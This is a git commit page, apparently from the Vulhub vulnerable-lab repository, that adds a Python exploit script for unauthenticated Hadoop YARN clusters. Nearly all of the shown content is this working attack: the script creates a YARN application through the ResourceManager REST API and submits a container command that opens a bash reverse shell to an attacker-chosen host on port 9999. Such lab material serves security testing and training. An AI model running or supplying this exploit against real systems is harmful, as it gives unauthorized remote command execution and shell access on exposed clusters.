first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
22
hadoop/unauthorized-yarn/exploit.py
Normal file
22
hadoop/unauthorized-yarn/exploit.py
Normal file
@@ -0,0 +1,22 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import requests
|
||||
|
||||
target = 'http://127.0.0.1:8088/'
|
||||
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999
|
||||
|
||||
url = target + 'ws/v1/cluster/apps/new-application'
|
||||
resp = requests.post(url)
|
||||
app_id = resp.json()['application-id']
|
||||
url = target + 'ws/v1/cluster/apps'
|
||||
data = {
|
||||
'application-id': app_id,
|
||||
'application-name': 'get-shell',
|
||||
'am-container-spec': {
|
||||
'commands': {
|
||||
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
|
||||
},
|
||||
},
|
||||
'application-type': 'YARN',
|
||||
}
|
||||
requests.post(url, json=data)
|
||||
Reference in New Issue
Block a user